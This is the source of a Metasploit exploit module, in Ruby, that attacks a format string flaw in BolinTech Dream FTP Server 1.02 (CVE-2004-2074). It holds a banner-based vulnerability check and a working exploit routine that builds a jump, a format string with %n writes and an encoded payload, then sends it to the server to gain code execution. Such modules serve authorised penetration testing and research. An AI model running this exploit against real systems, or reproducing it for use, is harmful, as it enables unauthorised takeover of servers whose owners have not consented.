metasploit-gs/modules/exploits/windows/ftp/dreamftp_format.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
      'Description'	=> %q{
          This module exploits a format string overflow in the BolinTech
        Dream FTP Server version 1.02. Based on the exploit by SkyLined.
      },
      'Author' 		=> [ 'patrick' ],
      'Arch'		=> [ ARCH_X86 ],
      'License'        	=> MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-2074'],
          [ 'OSVDB', '4986'],
          [ 'BID', '9800'],
          [ 'EDB', '823']
        ],
      'Platform' 	=> ['win'],
      'Privileged'	=> false,
      'Payload'		=>
        {
          'Space'			=> 1000,
          'BadChars'		=> "\x00\x0a\x0d",
          'StackAdjustment'	=> -3500,
        },
      'Targets' 		=>
      [
        # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
        [
          'Dream FTP Server v1.02 Universal',
          {
            'Offset'			=> 3957680, # 0x3c63ff-0x4f
          }
        ],
      ],
      'DisclosureDate' => 'Mar 03 2004',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(21),
      ], self.class)
  end

  def check
    connect
    banner = sock.get_once
    disconnect
    if (banner.to_s =~ /Dream FTP Server/)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    select(nil,nil,nil,0.25)
    sploit = "\xeb\x29"
    sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
    sploit << "@@@@@@@@" + payload.encoded
    sock.put(sploit + "\r\n")
    select(nil,nil,nil,0.25)
    handler
    disconnect
  end

end